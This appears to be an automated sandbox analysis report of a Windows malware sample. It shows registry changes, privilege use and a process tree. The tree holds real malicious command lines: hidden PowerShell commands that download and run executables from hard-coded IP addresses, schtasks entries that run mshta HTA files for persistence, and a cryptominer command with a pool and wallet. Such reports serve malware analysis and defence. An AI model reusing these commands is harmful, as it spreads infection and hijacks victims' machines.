| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Julie - French (France)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Cosimo" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\lsr1041.lxa" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\ja-JP\\MSTTSLocjaJP.dat" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1040-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "804" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{2984A9DB-5689-43AD-877D-14999A15DD46}" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Discrete;Continuous" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR de-DE Lookup Lexicon" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "409;9" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\AI043082" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\AI041036" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "L1031" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{15E16AEC-F2F0-4E52-B0DF-029D11E58E4B}" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Vous avez sélectionné %1 comme voix par défaut." | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Julie" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\it-IT\\M1040Elsa" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\ja-JP\\M1041Ayumi" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - Japanese (Japan)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "14388" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe
"C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn JecbLmaitu6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\U44e8nmtz.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\U44e8nmtz.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn JecbLmaitu6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\U44e8nmtz.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE
"C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\76D.tmp\77E.tmp\77F.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\0389b600fa.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\0389b600fa.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn gEyPMmadXw2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\bnjQfCSgl.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\bnjQfCSgl.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn gEyPMmadXw2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\bnjQfCSgl.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE
"C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "rQEBVmaAVTd" /tr "mshta \"C:\Temp\1yURt7eZP.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\1yURt7eZP.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3hq2ldxe\3hq2ldxe.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES58C9.tmp" "c:\Users\Admin\AppData\Local\Temp\3hq2ldxe\CSCDDFC2C1F12EC4E808A2A10CED6C631B7.TMP"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5EA5.tmp\5EA6.tmp\5EA7.bat C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\ProgramData\ogatq\ckhhtd.exe
C:\ProgramData\ogatq\ckhhtd.exe
C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe"
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4164 -ip 4164
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 788
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z2xbmh2o\z2xbmh2o.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C3D.tmp" "c:\Users\Admin\AppData\Local\Temp\z2xbmh2o\CSC75D50354595B4C09B739CA329351D8DB.TMP"
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5700 -ip 5700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 788
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
